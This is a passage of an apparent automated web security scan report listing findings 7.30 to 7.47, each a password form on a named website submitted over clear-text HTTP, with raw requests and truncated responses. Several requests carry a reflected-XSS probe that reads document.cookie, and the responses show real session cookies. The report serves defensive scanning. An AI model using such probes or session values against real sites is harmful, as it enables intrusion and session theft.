Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...
7.30. http://www.embarkons.com/sharer.php/images/search-con.gif  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/search-con.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:15 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:17 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...
7.31. http://www.embarkons.com/sharer.php/images/search-con.gif  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/search-con.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:15 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:17 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...
7.32. http://www.embarkons.com/sharer.php/src/captcha.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/src/captcha.php HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:16 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...
7.33. http://www.embarkons.com/sharer.php/src/captcha.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/src/captcha.php HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:16 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...
7.34. http://www.ezyspot.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezyspot.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: www.ezyspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Sun, 17 Apr 2011 14:14:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: SESS6d5cee1f12a75d25bdb4f8cce517a887=vhmvsik0ihgph66i86527ecgq1; expires=Sun, 17-Apr-2011 19:48:07 GMT; path=/; domain=.ezyspot.com
Last-Modified: Sun, 17 Apr 2011 14:10:28 GMT
ETag: "09fc5e6c01869f47755b52b2afc74a46"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>A
...[SNIP]...
<div class="content">
<form action="/?destination=node%2Fadd%2Fdrigg" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...
7.35. http://www.forceindya.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forceindya.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: www.forceindya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Sun, 17 Apr 2011 14:14:51 GMT
Server: Apache
Cache-Control: must-revalidate
ETag: "3971f045cd9a98bd40e7777d2352a286"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
X-Powered-By: PHP/5.2.14
Set-Cookie: SESScd5f14015055dde96a852eab86a49d94=ee255076611c19d55aeee88e890d8001; expires=Tue, 10-May-2011 17:48:11 GMT; path=/; domain=.forceindya.com
Last-Modified: Sun, 17 Apr 2011 14:14:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<div class="content">
<form action="/submit?destination=node%2Fadd%2Fdrigg" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...
7.36. http://www.fulbright.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740077;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:18 GMT;path=/
Set-Cookie: CFTOKEN=87543621;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:18 GMT;path=/
Set-Cookie: CFID=27740077;path=/
Set-Cookie: CFTOKEN=87543621;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <META HTT
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...
7.37. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740217;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:52 GMT;path=/
Set-Cookie: CFTOKEN=16144393;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:52 GMT;path=/
Set-Cookie: CFID=27740217;path=/
Set-Cookie: CFTOKEN=16144393;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <META HTT
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...
7.38. http://www.fulbright.com/insite  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740252;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Set-Cookie: CFTOKEN=33554824;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title> The International Law Firm of Fulbright & Jaworski
- </title>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" href="/includes/
...[SNIP]...
<br />
   <form id="insitesearch" name="OptInRegister" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">
<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...
7.39. http://www.fulbright.com/insite  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740252;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Set-Cookie: CFTOKEN=33554824;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title> The International Law Firm of Fulbright & Jaworski
- </title>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" href="/includes/
...[SNIP]...
<br />
   <form id="loginOptIn" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">

<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...
7.40. http://www.gabbr.com/login/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login/ HTTP/1.1
Host: www.gabbr.com
Proxy-Connection: keep-alive
Referer: http://www.gabbr.com/submit'/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0499a3333cddafe009316e3c383858cf

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:49:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<div>
                                                                               <form action="http://www.gabbr.com/submit'/" method="post">
                                                                                       <p style="margin: 0px 10px 10px 10px;">
...[SNIP]...
<span style="margin-left: 20px;"><input name="userPassword" id="password" type="password" value="" size="9" maxlength="16"></span>
...[SNIP]...
7.41. http://www.gabbr.com/submit/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /submit/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit/ HTTP/1.1
Host: www.gabbr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=91a88c0154fc07891ca43304c71faf53; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</p>
                       
       <form action="" method="post">

                   <div style="margin: 0px 10px 10px 10px;">
...[SNIP]...
</span><input name="userPassword" id="password" type="password" value="" size="12" maxlength="16" style="margin-left: 20px;" />
                   </div>
...[SNIP]...
7.42. http://www.gamekicker.com/node/add/drigg  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamekicker.com
Path:   /node/add/drigg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /node/add/drigg HTTP/1.1
Host: www.gamekicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Sun, 17 Apr 2011 14:15:01 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
ETag: "3fa2f4d6be7822fc36b9c21709be4051"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Set-Cookie: SESS36e56acb22e80ac8af19585dda852f2a=0829a0d137b5364e4250e310b82a94d3; expires=Tue, 10-May-2011 17:48:22 GMT; path=/; domain=.gamekicker.com
Last-Modified: Sun, 17 Apr 2011 14:15:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
<div class="content">
<form action="/node/add/drigg?destination=node%2Fadd%2Fdrigg" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...
7.43. http://www.imera.com.br/post_d.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imera.com.br
Path:   /post_d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /post_d.html HTTP/1.1
Host: www.imera.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:51 GMT
Server: Apache/2.2.6 (Fedora)
Set-Cookie: JSESSIONID=9E310CDB5E7B8D27A297E4F959CA814D; Path=/
Cache-Control: no-store, max-age=0, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <meta http-equiv="Content-Type" content=
...[SNIP]...
</div>
                                           <form name="loginForm" id="loginForm" action="post_login_a.html" method="post" class="p10">
                                               <input type="hidden" id="linkName" name="linkName" value="" />
...[SNIP]...
<br/>
                                               <input type="password" id="userPassword" name="userPassword" maxlength="20" style="width:70%;" /><br/>
...[SNIP]...
7.44. http://www.influx.com.br/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.influx.com.br
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.influx.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 14:21:45 GMT
Connection: close
Content-Length: 28572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Conte
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<p>
<input name ="Txt_pwd" value="senha" type="password" size="20" onclick="this.value=''" />
</p>
...[SNIP]...
7.45. http://www.jamespot.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jamespot.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.jamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Set-Cookie: PHPSESSID=7922bdfdabcd5d7e2f1216efae7f20b0; path=/
Expires: 2011-04-17 16:15:23
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div id="form">            
               <form action="http://www.jamespot.com/" method="post" name="forms_login">
                   <input type="hidden" name="action" value="login" />
...[SNIP]...
<input type="text" class="text" name="login" value="Email" onclick="if (this.value=='Email')this.value='';" />
                       <input type="password" class="text" value="nothing" onclick="this.value=''" name="password" />
                   </div>
...[SNIP]...
7.46. http://www.jumptags.com/add/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jumptags.com
Path:   /add/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /add/ HTTP/1.1
Host: www.jumptags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sunday 15-May-1994 12:00:00 GMT
Date: Sun, 17 Apr 2011 13:54:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=172837114;expires=Tue, 09-Apr-2041 13:54:55 GMT;path=/
Set-Cookie: CFTOKEN=38475879;expires=Tue, 09-Apr-2041 13:54:55 GMT;path=/
Set-Cookie: JSESSIONID=8430ea9775209f9393e0464f2d2c33571f3f;path=/
Content-Length: 2631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- *** P
...[SNIP]...
<div id="dLoginBox">
<form action="/add/index.cfm" method="post" name="l" id="l">

<div class="content">
...[SNIP]...
</label>
   <input type="password" name="password" id="password">
   </div>
...[SNIP]...
7.47. http://www.librerio.com/inbox  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.librerio.com
Path:   /inbox

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /inbox HTTP/1.1
Host: www.librerio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:16 GMT
Server: Apache
Set-Cookie: libreck=MIYaGCVIjMjDB4YGnWlPWRBUqmIYgM55%2By08WQ8JjnwwJnKNMt5iVXCOblLaRPLQ2yz%2BH6kzqMggqJoOmenJ91cEerOuO9XleVMbfe5kMuA1ViaRObbe6FvHlTvwBnfCiFyRAvn4S%2Fp7%2BI3%2FkZd3TCo92qc54zMyfPA4ABuWRt9%2FLmmSXwoRUmfpKD6RoAzwSVppzW3tkaV29%2FuPSEJCQuZjYc%2F14V92EEBrYII%2BUYP2qjRRGiWsBoSArSSBxHwnDRbBYUAWnp%2BaeaW51GtycNNkraTAaU%2B9ywn2CPPGNTVy53roRtFqquiOv3agv7wjqVJfY1WNClZNj%2FDl4TfCRqvUGNWHG%2FisVe11%2BWqAEb9zveNIF%2FsF0%2BypIdCVvW69CR4mJSHR1nfliIXDEZ6huw34sL8UvdVHNSI4IKW6CexMrcu9jgNpZU1R4KgPFe%2FL7hyE1LOHn74v0HFTTOD2wn4iA4HtHr6m4040ENJJbqufVv5WwztygNmK4Z4eemvXdG26v1X%2B%2FnEG52R90wK2qvjGgKI8gNMy1I0QLMoqIwWtJ42%2B4miSmAtTHM5NYfb%2FwEua83%2B3seZY3LQme6fEwAenBnfLiX%2FK9xJhjsN1g%2BDf6b%2BJv4rWjhgDUR9kwL3M; expires=Fri, 22-Apr-2011 14:14:17 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 3684

<html>
<head><title> Save to Inbox </title>
<link rel="shortcut icon" href="/favicon.ico">
<link rel="icon" href="/favicon.ico" type="image/x-icon">
